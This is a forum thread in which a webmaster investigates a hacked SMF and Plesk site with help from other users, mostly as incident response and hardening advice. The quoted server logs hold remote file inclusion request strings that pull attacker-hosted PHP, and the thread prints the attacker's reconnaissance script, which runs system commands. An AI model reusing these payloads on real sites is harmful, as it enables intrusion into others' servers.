my SMF forum has been hacked

[societyofrobots]

My website has been hacked, but I can't figure out how or why. My host is now blaming it on a security flaw in SMF as the source of the hack. Let me explain . . .

A small percentage of my site visitors are reporting that when they visit my site a few things happen:

- pop-ups and redirects of spam/porn/etc. sites
- page attempts to install a javascript trojan virus (caught by virus scanners)
- creates an 'add on' to internet explorer and a memory process that replaced the add on if you disable it
- doesn't always happen

It happens on Google Chrome, Firefox, and IE browsers, also on both Windows and Linux. I'm using SMF 1.1.8.

Virus scanners clean the problem, seeing something like:
"Extracting files:-  reDistribtion\Download\Install\windows-kb890830-v2.8-delta.exe"
and "JS Redirector E trojan horse"

I asked the visitors to show me source source code of any page that causes a problem. The malicious code gets tacked on at the end of the normal page source. Its basically a highly obfuscated javascript, followed by random words, thousands of links to porn sites and other spam sites, a few links to my own site, etc. Its pretty nasty looking. I'll post it if anyone wants to see it.

The visitors reported it only happening to my .shtml pages, not the forum. But considering it only happens a small percentage of the time, that doesn't rule out the forum or SMF.

So first thing I think is, my site has been hacked. I look through all my source code, all my non-forum files, but nothing has been modified. Nothing tacked on. Everything looks clean. So that makes me think its server level . . .

So I do a rootkit scan on my host, and get this:
/bin/kill  [ BAD ]
/sbin/insmod  [ BAD ]
/sbin/lsmod  [ BAD ]
/sbin/modprobe  [ BAD ]

All other files come out fine. So I contacted my host, Lunarpages, and they make this claim:

Hello I checked files: / bin / kill [BAD] / sbin / insmod [BAD] / sbin / lsmod [BAD] / sbin / modprobe [BAD] They have not been changed. Sometimes scanners give erroneous information.

This is *their* default scanner. No idea why they'd use a scanner that gives erroneous information and not know why . . .

So after hassling them, I get them to check the logs and they find this below information. I apologize, but anyone who uses Lunarpages knows that they haven't yet learned how to parse emails. I complain all the time, but they ignore it . . . at the end of their email, they blame SMF and php.ini. Throughout the log shows weird links being tacked on to my forum links (robotforum/...):

Hello, I have checked your Apache logs and found the following information : 212.187.255.241 - - [17/Mar/2009:05:08:59 -0700] "POST /xmlrpc.php HTTP/1.1" 404 6705 "-" "libwww-perl/5.65" 67.76.163.60 - - [17/Mar/2009:07:46:45 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://jiahn.com/ktools_v1/ktools/id.txt HTTP/1.1" 404 6907 "-" "libwww-perl/5.79" 67.76.163.60 - - [17/Mar/2009:07:47:03 -0700] "GET /robotforum//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://jiahn.com/ktools_v1/ktools/id.txt HTTP/1.1" 200 27047 "-" "libwww-perl/5.79" 212.117.165.14 - - [17/Mar/2009:09:56:18 -0700] "GET /content.php?page=http://203.114.112.155/webboard1234/mic.txt HTTP/1.1" 404 6758 "-" "libwww-perl/5.824" 212.117.165.14 - - [17/Mar/2009:09:56:17 -0700] "GET /robotforum/index.php?action=printpage;topic=462.0/content.php?page=http://203.114.112.155/webboard1234/mic.txt HTTP/1.1" 200 14632 "-" "libwww-perl/5.824" 212.117.165.14 - - [17/Mar/2009:09:56:19 -0700] "GET /robotforum/content.php?page=http://203.114.112.155/webboard1234/mic.txt HTTP/1.1" 404 6769 "-" "libwww-perl/5.824" 212.117.165.14 - - [17/Mar/2009:09:56:20 -0700] "GET /robotforum/index.php?action=printpage;topic=462.0/content.php?page=http://203.114.112.155/webboard1234/mic.txt HTTP/1.1" 200 14632 "-" "libwww-perl/5.824" 212.117.165.14 - - [17/Mar/2009:09:56:21 -0700] "GET /robotforum/content.php?page=http://203.114.112.155/webboard1234/mic.txt HTTP/1.1" 404 6769 "-" "libwww-perl/5.824" 212.117.165.14 - - [17/Mar/2009:09:56:21 -0700] "GET /content.php?page=http://203.114.112.155/webboard1234/mic.txt HTTP/1.1" 404 6758 "-" "libwww-perl/5.824" 212.117.165.14 - - [17/Mar/2009:09:56:39 -0700] "GET /robotforum/index.php?action=profile;u=281;sa=showPosts/content.php?page=http://203.114.112.155/webboard1234/mic.txt HTTP/1.1" 200 19500 "-" "libwww-perl/5.824" 212.117.165.14 - - [17/Mar/2009:09:56:49 -0700] "GET /robotforum/index.php?action=profile;u=281;sa=showPosts/content.php?page=http://203.114.112.155/webboard1234/mic.txt HTTP/1.1" 200 19563 "-" "libwww-perl/5.824" 212.117.165.14 - - [17/Mar/2009:09:58:42 -0700] "GET /robotforum/index.php?action=printpage;topic=462.0%20/content.php?page=http://203.114.112.155/webboard1234/mic.txt HTTP/1.1" 200 14632 "-" "libwww-perl/5.824" 212.117.165.14 - - [17/Mar/2009:09:59:06 -0700] "GET /robotforum/index.php?action=printpage;topic=462.0%20/content.php?page=http://203.114.112.155/webboard1234/mic.txt HTTP/1.1" 200 14632 "-" "libwww-perl/5.824" It seems that the index.php is vulnerable to remote inclusion as you can see from the logs above. I have checked and there are no weird processes running on your VPS and checked the /tmp partition and it doesn't appear to be containing any exploit related files. Please add the following lines within your your php.ini configuration file : allow_url_fopen = Off I have checked and register_globals is currently set to off : [root@vps tmp]# cat /etc/php.ini | grep register_globals ; - register_globals = Off [Security, Performance] ; Note that register_globals is going to be depracated (i.e., turned off by ; register_globals to be on; Using form variables as globals can easily lead register_globals = Off Please also upgrade your scripts to the latest version. Let us know if you have any questions or issues. We will be happy to respond to them. Thank you ! Kind Regards, Margarit Mugurel Junior System Admin I - System Administrator Team Support and Assistance: Help Desk - https://support.lunarpages.com/ Membership Forum - http://www.lunarforums.com/ Tutorials - http://www.lunarpages.com/tutorials/ Phones: U.S. & International - 1-714-521-8150

Well, looking at those links in the logs, I see php, such as from:
http://jiahn.com/ktools_v1/ktools/id.txt?

Code Select Expand

<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }                          

echo "Insiderz<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "Insiderz was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;


So then I look at my forum files, and immediately see tons of fake .html files that have names similar to legit files outside of my forum. For example, a legit file is news_read.shtml located outside my forum folder, but these fake files are located in the folder and labeled like news_read_e.html. No pattern to the naming, but something like this.

Annoyingly, I upgraded my forum to the latest version around Feb 7th, and all these fake files have been created on that same day. So can't easily figure out which are hacked or not . . .

What do you recommend?!

[societyofrobots]

Just some additional notes . . .

A "_img" folder containing more fake files was found in the main directory.

Also some of the files in the main directory appeared to be overwritten, such as:
SSI.php
ssi_examples.shtml
ssi_examples.php
news_readme.html

I couldn't find anything else strange . . . but I'm definitely no php or web security expert!

I've repaired and deleted any and all the strangeness . . . but not sure if some backdoor is still hidden. I wonder if anything is hidden in the database . . .

Also, I determined the fake files were installed on 2/7/09, over a period of an hour from the first file to the last. The hack wasn't reported until more than a month later by users . . . a timed release?

[karlbenson]

These are attempted hacks, and the ones related to SMF will NOT work on smf.

It is COMMON for websites (not just smf) to get these attempted hacks for a variety of software.
On my old forum, I was getting hundreds of them daily for phpbb/joomla and vbulletin, even though I'd never used any of them on that domain/host.

They won't work on SMF because smf sanitizes/checks the $_GET url variables.  But that doesn't stop these people attempting them (mores the pity, its a waste of resources).

Even though I know they won't work, I double-checked and tested on a fresh 1.1.8 install and none work for smf.
I can ONLY speak for the SMF related ones, I would suggest that these urls & SMF are NOT the method by which you were hacked.

However if you do manage to find an actual smf exploit, security reports can be sent via http://www.simplemachines.org/about/security.php

Best of luck with resolving your hacking issue, and getting your forum back.

Karl

[societyofrobots]

regularexpression, so what you are saying is, it's impossible for them to have modified the forum database in any way?

And that I have some other security flaw that allowed them to install files into my SMF directory?

The only php I am using is the forum. Outside of that, I don't have anything that would have security flaws . . . at least not the type that can be exploited in automated fashion . . .

Also, I forum banned the IPs that were used in the attack (according to the logs). Not sure what else to do . . .

[karlbenson]

SMF sanitizies them to make sure they are valid or just ignores them.
(but they will still get logged in your server logs).

They haven't got in SMF via that way.  Never say never that there isn't an as yet unknown unpatched exploit with smf.

However in my experience, this type of hack is usually as a result of a compromised host account.

If your on a shared server, it might not even have been your account that was compromised, but another on that server
It would be the first time that that has happened.

[Kenny01]

regularexpression, so what you are saying is, it's impossible for them to have modified the forum database in any way?

And that I have some other security flaw that allowed them to install files into my SMF directory?

The only php I am using is the forum. Outside of that, I don't have anything that would have security flaws . . . at least not the type that can be exploited in automated fashion . . .

Also, I forum banned the IPs that were used in the attack (according to the logs). Not sure what else to do . . .

Are you on a share host?

[societyofrobots]

Where was the IP from?

see first post
But actually it doesn't matter, it appears the hacker is using proxy sites so his IP is constantly changing.

Are you on a share host?

yes

So I had a closer look at my error logs myself and not trusting my host, and daaammmmnnn! It appears I've been the prime target for a hacker for a month or more! I see dozens of attacks onto my website, including lots of brute force stuff.

More importantly, I found fake files hidden outside of SMF directories.

And most strangely, I found a file called "at_domains_index.html" in my main directory with an odd script. When I try to copy/paste it anywhere, it immediately loads up the redirect porn link and javascript html. I can't copy/paste it alone!!! I suspect somehow my server loaded this file to redirect links . . . deleting it didn't break anything . . .

[!wooha]

1. dont  "forum ban", ban with .htaccess. Dont just ban xx.xx.xx.xx, but look up the domain range and then ban that: - you will then be banning 40,000 IPs at one time.

For your site, you need to erase EVERYTING (SAVING YOUR SETTINGS PHP) and upload fresh copies of everything.

they can put stuff in your database (like additional admin or moderator users) also, HTML with javascript in posts can steal your admin cookie or session to regain control.

finally, if you have access to exec(), then they could  possibly setup a scheduled cron process to reinstall ******.

I figure you have a good 4-6 hours of work to do it right.  good luck

[Kenny01]

You need to first notify your host.

[!wooha]

You need to first notify your host.

hello??? dont you read before adding your bits of wisdom??

he's already been at it with his host for quite a while!

@societyofrobots
The "rootkit" scan you ran may not be worth the time you took to run it!
Why?

1. To really run a true "rootkit scan" you would have had to boot the physical server from a recovery CD and/or operate on an image of the drive when it is not running the operating system.
Since you are on shared hosting, there is no way you would have had access to do all that, unless you were sharing hosting with your Mom

2. The files it pointed out, while they may be used to do naughty things, are required and previously existing files on a Linux distro, so unless they have been modifed, there is nothing to worry about (like they said)

Again, the fact that they have taken the trouble to install all those backdoor files shows that they were prepared to be in your a$$ for the long haul!

I would seriously consider escalating your response, i.e. assume that your personal PC may have been compromised, and run a scan on your local PC, check against your local accounts ,( make sure for example that you dont have the same passsword for other accounts) and that you maybe change your CPANEL passwords.

Remember that when you change your passwords for a system, you change them ALL.

For instance, lets say somebody at your job used a keystroke logger to record your password to SMF and was able to capture it.
Suspecting this, you change your SMF password... BUT.. your SMF account has an email address associated with it, so if that email account is also compromised, then they/he can use the "Remind Me" feature to reacquire it.

[societyofrobots]

My concern is that if I don't even know how they got in, wiping my server clean and reinstalling won't achieve anything. It'll be just as insecure as before, and hacked again.

I would assume if the hacker has a back door setup, or I didn't patch the hole, I'll just see the same thing happen again. If not, I'm probably secure. It looks like an automated hack, not something specifically directed at me.

1. dont  "forum ban", ban with .htaccess. Dont just ban xx.xx.xx.xx, but look up the domain range and then ban that: - you will then be banning 40,000 IPs at one time.

Way ahead of you. Unfortunately I can tell the hacker is using proxies. He has a *lot* of IP addresses . . .


an update:
It turns out at_domains_index.html is a file that's used for Plesk, the control panel for my site. If Plesk sees that file, it'll overrule the traditional index.html. Strangely, I had that option turned off, which means there is a good chance Plesk itself was somehow hacked. I just upgraded it to the 9.0 version from 8.6, but no way to really know . . .

Below is a highly abridged log of errors on only Feb 7th. I removed repeats (dozens) and obviously failed brute force hacks (thousands). The below is what I don't understand . . . of course, hacks that worked wouldn't be in the error log. My site gets heavy traffic, so I don't keep non-error logs for longer than a few days (60mb+ log file per day).

Code Select Expand


[client 77.221.130.5] script
'/var/www/vhosts/societyofrobots.com/httpdocs/robotforum/errors.php'
not found or unable to stat
[client 77.221.130.5] script
'/var/www/vhosts/societyofrobots.com/httpdocs/errors.php'
not found or unable to stat
[client 209.11.246.11] script
'/var/www/vhosts/societyofrobots.com/httpdocs/index.php' not
found or unable to stat
[Sat Feb 07 01:47:46 2009] [error] [client 222.79.60.234] File does
not exist: /var/www/vhosts/societyofrobots.com/httpdocs/prxjdg.cgi
[Sat Feb 07 02:42:06 2009] [error] [client 201.255.169.142] malformed
header from script. Bad header=All_is_OK: b282a0a7e598.pl
[Sat Feb 07 02:42:06 2009] [warn] /b282a0a7e598.pl did not send an HTTP header
[client 201.255.169.142] PHP Parse error:  parse error, unexpected
'.' in
/var/www/vhosts/societyofrobots.com/httpdocs/iddqd18.php on line 3
[Sat Feb 07 03:24:23 2009] [error] [client 77.221.130.2] File does not
exist: /var/www/vhosts/societyofrobots.com/httpdocs/robotforum/index.php%3Ftopic%3D1103.0
[client 76.68.97.150] PHP Warning:  POST Content-Length of 298286612
bytes exceeds the limit of 8388608 bytes in Unknown on line 0,
referer: http://societyofrobots.com/member_tutorials/node/287/edit
[Sat Feb 07 04:25:57 2009] [error] [client 66.249.70.108] File does
not exist: /var/www/vhosts/societyofrobots.com/httpdocs/robot_arm_card_dealer.shtml&usg=__lODvnpYsxvVPyRxv7uTQnZGsoC4=
[client 76.68.97.150] PHP Warning:  POST Content-Length of 298286609
bytes exceeds the limit of 8388608 bytes in Unknown on line 0,
referer: http://societyofrobots.com/member_tutorials/node/287/edit
[client 74.200.223.213] script
'/var/www/vhosts/societyofrobots.com/httpdocs/sub.php' not
found or unable to stat
[client 74.200.223.213] script
'/var/www/vhosts/societyofrobots.com/httpdocs/robotforum/sub.php'
not found or unable to stat


[!wooha]

My concern is that if I don't even know how they got in, wiping my server clean and reinstalling won't achieve anything. It'll be just as insecure as before, and hacked again.

I would assume if the hacker has a back door setup, or I didn't patch the hole, I'll just see the same thing happen again. If not, I'm probably secure. It looks like an automated hack, not something specifically directed at me.

1. dont  "forum ban", ban with .htaccess. Dont just ban xx.xx.xx.xx, but look up the domain range and then ban that: - you will then be banning 40,000 IPs at one time.

Way ahead of you. Unfortunately I can tell the hacker is using proxies. He has a *lot* of IP addresses . . .

I stand corrected - looking at your messages here again, I see that you have a VPS account, which is basically the same as a Dedicated Server : With ROOT access and all, only thing is that the physical machine runs a few other clients as well, correct? or is the tech guy misspeaking?

Yes, wiping it all out w/o know all can lead to a self cycling loop of constant repair, but you do have some advantages:

1. One, you know ****** can happen, did happen, probably/possibly will happen again so now you are gonna be prepared for it.
  a.

an update:
It turns out at_domains_index.html is a file that's used for Plesk, the control panel for my site. If Plesk sees that file, it'll overrule the traditional index.html. Strangely, I had that option turned off, which means there is a good chance Plesk itself was somehow hacked. I just upgraded it to the 9.0 version from 8.6, but no way to really know . . .

THERE IS A PLESK VULNERABILITY FOR THE VERSION YOU JUST UPGRADED FROM!
http://seclists.org/bugtraq/2008/Sep/0001.html

This has been around since August Last Year!
So if your upgrade has been only recently, you may have basically just wallpapered a wall with the termites already inside! (dont you just love exclamation points?? )


I would suggest:
1. reimaging your VPS, then immediately applying the upgrades to all the core apps. I say this because, since you are running VPS which means dedicated hosting,basically - your Apache settings and others may not have been set with the paranoia (and restrictions) that regular shared hosting may enjoy. * This is taken in an abundance of caution- depending on how much work/cost it is, I  would do it for the peace of mind and knowing I am starting from a level field.

=YOUR FIRST AND MOST IMPORTANT STEP=
Ensure that even if someone gets a shell prompt (i.e. from php run exec(') or system() that THAT user context can not execute anything important..
Now we have verified that the OS is running safe, we can reinstall the forum and rest of the site.

If you havent already, I would suggest setting up a SVN or source control system, for all files:  that way you have a way of tracking those incremental mods that you make, giving you the ability to detect tampering, and rolling back your self-induced errors

P.S. For generally security re proxies:
I have heavily commented .htaccess file (you may want to convert that to IPTABLES or other for effeciency) that bans just about all the server farms out there.

I also have a "realbrowser" detection script that deflects users using automated scripts like the libw/perl you have encountered (but are sneaky smart enough to change the user agent to fake a browser)

depending on your site, you may want to block some regions like Kazahkstan and Waristan who have 10 people who all want to come to my site to sell viagra!

[metallica48423]

If, for whatever reason, you think your VPS system is infected --- if you cannot within your means clean it, most certainly ask for it to be reimaged.  Many Virtuozzo containers providers will actually let you re-image it yourself.

Make sure to keep/backup all your account data though as you'll have to restore it!!

[societyofrobots]

I'm still investigating this . . . posting the info in the hopes it'll help someone else, too . . . I'm pretty sure the hack did not involve SMF.

I'm also pretty sure now that the security hole was in Plesk 8.6.0, thanks for the link !wooha.

It occurred to me to look at my ftp transfer log, and I found more interesting stuff . . . the hack appears to have started at:
Sat Feb 7 02:41:41 2009
and ended at:
Sat Feb 7 10:07:32 2009
a single IP was used the entire time, 201.255.169.142
An action occurred every few seconds, from 8 to 30 seconds or so . . .

Looking at the log, I see these interesting lines . . .

Code Select Expand


Sat Feb 7 02:41:41 2009 0 201.255.169.142 20 /mysite.com/test1234.html b _ i r user ftp 0 * c
Sat Feb 7 02:41:47 2009 0 201.255.169.142 20 /mysite.com/test1234.html b _ d r user ftp 0 * c
Sat Feb 7 02:41:54 2009 0 201.255.169.142 50 /mysite.com/b282a0a7e598.py b _ i r user ftp 0 * c
Sat Feb 7 02:41:57 2009 0 201.255.169.142 50 /mysite.com/b282a0a7e598.py b _ d r user ftp 0 * c
Sat Feb 7 02:42:03 2009 0 201.255.169.142 128 /mysite.com/b282a0a7e598.pl b _ i r user ftp 0 * c
Sat Feb 7 02:42:07 2009 0 201.255.169.142 128 /mysite.com/b282a0a7e598.pl b _ d r user ftp 0 * c
Sat Feb 7 02:42:13 2009 0 201.255.169.142 201 /mysite.com/b282a0a7e598.cgi b _ i r user ftp 0 * c
Sat Feb 7 02:42:19 2009 0 201.255.169.142 201 /mysite.com/b282a0a7e598.cgi b _ d r user ftp 0 * c
Sat Feb 7 02:42:27 2009 1 201.255.169.142 49 /mysite.com/b282a0a7e598.rb b _ i r user ftp 0 * c
Sat Feb 7 02:42:29 2009 0 201.255.169.142 49 /mysite.com/b282a0a7e598.rb b _ d r user ftp 0 * c
Sat Feb 7 02:42:35 2009 0 201.255.169.142 75 /mysite.com/b282a0a7e598.php b _ i r user ftp 0 * c
Sat Feb 7 02:42:39 2009 0 201.255.169.142 75 /mysite.com/b282a0a7e598.php b _ d r user ftp 0 * c
Sat Feb 7 02:42:46 2009 0 201.255.169.142 95 /mysite.com/b282a0a7e598.asp b _ i r user ftp 0 * c
Sat Feb 7 02:42:48 2009 0 201.255.169.142 95 /mysite.com/b282a0a7e598.asp b _ d r user ftp 0 * c


You can google these files and actually find them . . . but opening them up didn't reveal anything my noob self could identify. Now I also saw this:

Code Select Expand


Sat Feb 7 03:02:47 2009 0 201.255.169.142 991 /mysite.com/iddqd18.php b _ i r user ftp 0 * c
Sat Feb 7 03:04:44 2009 0 201.255.169.142 991 /mysite.com/iddqd18.php b _ d r user ftp 0 * c


so googling it, I find errors such as:

Code Select Expand


[09-Feb-2009 08:10:05] PHP Parse error:  syntax error, unexpected '.' in /home/some_site/public_html/iddqd18.php on line 3


The dates on those errors are all January and February, so it's a hack that's been around for awhile . . . but one result has 2007 as the date . . . maybe its a legit file name?

Anyway, the rest of the log file shows the hacker downloading many of my site pages and uploading his files . . . I guess it didn't help I had anonymous ftp enabled, oops!

I gotta figure out how the hack happened, I can be overzealous sometimes . . .

[!wooha]

ok... what you see there is a 'basic probe'

various code file with different languages (.PY = python, .php =PHP, .asp ="ASP -active server pages" )

If you still had your HTML logs, you may have found that there was a GET or HEAD request for each one of those files, and, based on the response, he would have known exactly what kind of code your server can run.

Now the IP address when googled, actually only pointed back to this thread.
This to me is a good thing. This means that the IP hasnt been whored about that much yet, and the number of parties publicly using it is probably small and may be only one person!.

I would report the intrusion to the FBI and retain any logs. Also, I would make a direct complaint to the isp behind it.
Why the FBI? <shrug> I pay my taxes, I dont care if they are overworked! lol, anyway, it all goes into this magical database in the sky, if this guy ever gets caught, your report may mean the difference between probation and jail time, account warning, or cancellation, so yeah, report the little fuc*ker :angry-face-smiley:

Yeah... anon FTP...lol... that may have been the real culprit even tho there was an exploit with Plesk, FTP is soooooo much easier!.

Here's what I recommend.
Get an account at 1and1 for $5/month.

(cheap, fast, lost of space! Their support is ******ty,but we wont be using their support, just space, bandwidth and a little bit of scripting)

On the 1and1 site, we gonna install a little script that will connect to your server, and FTP over the files (it will basically do a server to server backup)
With shell access on your main server, you will execute a command to zip up everything, but instead downloading the backup over your relatively slow ISP, we do the server to server...blindingly fast!

like metallica48423 sayz: Backup Backup Backup Backup .
Discuss with your host the consequences (and costs) of a reimage. Note that a re-image means just that: If the image was made in Janurary and security releases made in March, then you would have to upgrade security after your clean image.

Do three zip file backups, the Attachments, Avatars and code folders.
(and also separately save your settings.php)

I would def go with a reimage tho... no telling what crap is there (I certainly cant, not knowing how secure/insecure it was to begin with) so you have to balance the cost of the uncertainty against the cost of reimaging it all.

at the very least,we want to clear out the entire webspace AND COPY FRESH VERSIONS OF SMF AND MODS, DOWNLOADED FROM ORIGINAL SOURCES.

The folders etc will be the same.

Now you will go through (locally) the avatar and attachments folders and check the .htaccess files to make sure they match the original files from SMF! This is because you can put a command in .htaccess to tell it "parse and execute .GIF files as PHP!" then, they upload an avatar or something, and then..

www.yoursite/folder/nastyavatar.gif (but its really a php file that opens up a whole can of worms all over again)

so we check that.

We also should check the database (forum) for any HTML (scripting) that has been added to steal your cookies. - again, the chance of this is generally pretty low,and its a bit of work, but this guy is obviously a professional who knows what he's about - and so should you!

There is a setting in SMF that disables HTML in posts, also disable flash too. Unfortunately for you, SMF doesnt disable HTML in headings like forum headings/names, so, if as a backdoor person, he gave himself admin privileges, he COULD have edited some headings to call nasty scripts (this is easy to check, a quick mySQL query for '<' (and it's entity equivalent should suffice.

Now we know our database and all is clear, we can create a mySQLdump and transfer the files over to our holding server as well.


This second site is also useful for the following.

If you ever have to take down the main site, for any reason, you can temporarily redirect to HTML static pages on the other site. I say "html static" because you dont want to overwhelm the simple shared hosting of that account.

good luck!

I estimate you have a good 4-6 hours of work to do.

[societyofrobots]

Since I spent the last week learning tons about web security, I figured I'd write up a 'website security for noobs' article. Besides, our forums are about our hobbies/interests, not web security expertise!

http://www.societyofrobots.com/misc_hackproof.shtml

Hope that saves other noobs like me the pain of being hacked . . . and for the experts here, feel free to chime in.

I would report the intrusion to the FBI and retain any logs. Also, I would make a direct complaint to the isp behind it.

Police in even the most advanced countries would care less unless several million dollars were somehow involved in the hack. I emailed the ISP, it returned an 'email does not exist' error. WWW means wild west world, everyone for themselves . . . In the 3rd world you have to bribe police to get any investigation/arrests done - the internet is a 3rd world country in my opinion. Rampant crime, dysfunctional 'government', poor organization, censorship . . . but I digress . . .



I'm pretty sure SMF is clean now, more worried about other hidden server level files.

We also should check the database (forum) for any HTML (scripting) that has been added to steal your cookies. - again, the chance of this is generally pretty low,and its a bit of work, but this guy is obviously a professional who knows what he's about - and so should you!
...SMF doesnt disable HTML in headings like forum headings/names, so, if as a backdoor person, he gave himself admin privileges, he COULD have edited some headings to call nasty scripts (this is easy to check, a quick mySQL query for '<' (and it's entity equivalent should suffice.

How would you recommend checking the forum DB? Just that one search? I did that search, but it was pretty useless:
1 match(es) inside table smf_settings
1899 match(es) inside table smf_personal_messages
38819 match(es) inside table smf_messages
67 match(es) inside table smf_members
20 match(es) inside table smf_log_errors

[karlbenson]

Since this doesn't appear to be an actual bug. I'm moving this to 1.1.x support areas.

It may get a bit more attention there for any remaining issues you have in getting your old forum back to normal again.

[societyofrobots]

Good news, sorta. My logs show the hacker trying to hack me again with the same old method. This time its not sticking. I'm pretty sure it was the Plesk exploit that got me. This is what my logs now say:

[Mon Apr 06 13:27:36 2009] [error] [client 59.56.110.150] File does
not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi
[Mon Apr 06 13:27:37 2009] [error] [client 59.56.110.150] File does
not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi
[Mon Apr 06 13:27:42 2009] [error] [client 59.56.110.150] File does
not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi
[Mon Apr 06 13:27:43 2009] [error] [client 59.56.110.150] File does
not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi
[Mon Apr 06 13:31:16 2009] [warn] RSA server certificate CommonName
(CN) `plesk' does NOT match server name!?
[Mon Apr 06 13:31:21 2009] [warn] RSA server certificate CommonName
(CN) `plesk' does NOT match server name!?
[client 211.239.167.237] script
'/var/www/vhosts/my_site.com/httpdocs/forum/global.php'
not found or unable to stat
[client 211.239.167.237] script
'/var/www/vhosts/my_site.com/httpdocs/global.php' not found or
unable to stat
[client 211.239.167.237] script
'/var/www/vhosts/my_site.com/httpdocs/global.php' not found or
unable to stat
[client 211.239.167.237] script
'/var/www/vhosts/my_site.com/httpdocs/forum/global.php'
not found or unable to stat
[client 211.239.167.237] script
'/var/www/vhosts/my_site.com/httpdocs/global.php' not found or
unable to stat
[client 211.239.167.237] script
'/var/www/vhosts/my_site.com/httpdocs/forum/global.php'
not found or unable to stat

[JBlaze]

societyofrobots, is this issue resolved now? If not, please provide some details of the issue.

[societyofrobots]

So I got hacked again after updating Plesk, so apparently it's not Plesk that's the hole. It appears it's actually SMF thats the problem, but not really sure how. They somehow get FTP access, so I turn off FTP now whenever I'm not using it.

It also appears to be multiple hackers doing it, with dozens of IP addresses, as the attack style and spam posted up is different. This leads me to believe its a known and common exploit being used on popular software . . .


Anyway, here are my logs from the latest hack below. I filtered them and left the interesting stuff:

//billions of these!
[Thu Apr 16 23:20:05 2009] [error] [client 202.46.80.62] request failed: error reading the headers
[Thu Apr 16 23:20:06 2009] [error] [client 202.46.80.62] request failed: error reading the headers
[Thu Apr 16 23:20:07 2009] [error] [client 202.46.80.62] request failed: error reading the headers
[Thu Apr 16 23:20:08 2009] [error] [client 202.46.80.62] request failed: error reading the headers
[Thu Apr 16 23:20:08 2009] [error] [client 202.46.80.62] request failed: error reading the headers
[Thu Apr 16 23:20:09 2009] [error] [client 202.46.80.62] request failed: error reading the headers
[Thu Apr 16 23:20:10 2009] [error] [client 118.98.177.130] request failed: error reading the headers
[Thu Apr 16 23:20:10 2009] [error] [client 202.46.80.62] request failed: error reading the headers
[Thu Apr 16 23:20:11 2009] [error] [client 118.98.177.130] request failed: error reading the headers
[Thu Apr 16 23:20:16 2009] [error] [client 118.98.177.130] request failed: error reading the headers
[Thu Apr 16 23:20:17 2009] [error] [client 118.98.177.130] request failed: error reading the headers
[Thu Apr 16 23:20:18 2009] [error] [client 118.98.177.130] request failed: error reading the headers
[Thu Apr 16 23:20:19 2009] [error] [client 118.98.177.130] request failed: error reading the headers
[Thu Apr 16 23:20:20 2009] [error] [client 118.98.177.130] request failed: error reading the headers

[client 69.65.19.207] script '/var/www/vhosts/my_site.com/httpdocs/index.php' not found or unable to stat
[Fri Apr 17 23:24:24 2009] [error] [client 59.56.109.34] File does not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi
[Fri Apr 17 23:24:25 2009] [error] [client 59.56.109.34] File does not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi
[Fri Apr 17 23:24:25 2009] [error] [client 59.56.109.34] File does not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi
[Fri Apr 17 23:24:29 2009] [error] [client 59.56.109.34] File does not exist: /var/www/vhosts/my_site.com/httpdocs/prxjdg.cgi


[client 211.172.225.50] script '/var/www/vhosts/my_site.com/httpdocs/detail.php' not found or unable to stat

[client 118.219.232.137] script '/var/www/vhosts/my_site.com/httpdocs/index.php' not found or unable to stat

[Sun Apr 19 20:10:40 2009] [error] [client 190.17.80.129] File does not exist: /var/www/vhosts/my_site.com/httpdocs/ladies
[Sun Apr 19 20:15:26 2009] [error] [client 72.30.142.169] File does not exist: /var/www/vhosts/my_site.com/httpdocs/downloads/_images
[Sun Apr 19 20:21:09 2009] [error] [client 65.55.209.30] File does not exist: /var/www/vhosts/my_site.com/httpdocs/forum/_img

[client 212.241.182.242] script '/var/www/vhosts/my_site.com/httpdocs/products.php' not found or unable to stat
[client 212.241.182.242] script '/var/www/vhosts/my_site.com/httpdocs/forum/products.php' not found or unable to stat

[Sun Apr 19 21:51:39 2009] [error] [client 72.30.142.169] File does not exist: /var/www/vhosts/my_site.com/httpdocs/Consortium
[Sun Apr 19 21:58:27 2009] [error] [client 193.47.80.44] File does not exist: /var/www/vhosts/my_site.com/httpdocs/Library


[Sun Apr 19 22:26:50 2009] [error] [client 70.78.72.188] Invalid URI in request %3A%22646c14d465e47ba21040ae65bbd7746ac8d5004c%22%3Bi%3A2%3Bi%3A1429421156%3Bi%3A3%3Bi%3A0%3B%7D; PHPSESSID=ffe0e2e3de55e43a82f25c87ead23e59; __utma=53814186.1704686547.1240208609.1240208609.1240208609.1; __utmb=53814186; __utmc=53814186; __utmz=53814186.1240208609.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

[Mon Apr 20 00:12:29 2009] [error] [client 62.212.66.5] File does not exist: /var/www/vhosts/my_site.com/httpdocs/administrator
[Mon Apr 20 00:12:29 2009] [error] [client 62.212.66.5] File does not exist: /var/www/vhosts/my_site.com/httpdocs/forum/administrator
[Mon Apr 20 00:12:34 2009] [error] [client 62.212.66.5] File does not exist: /var/www/vhosts/my_site.com/httpdocs/forum/administrator
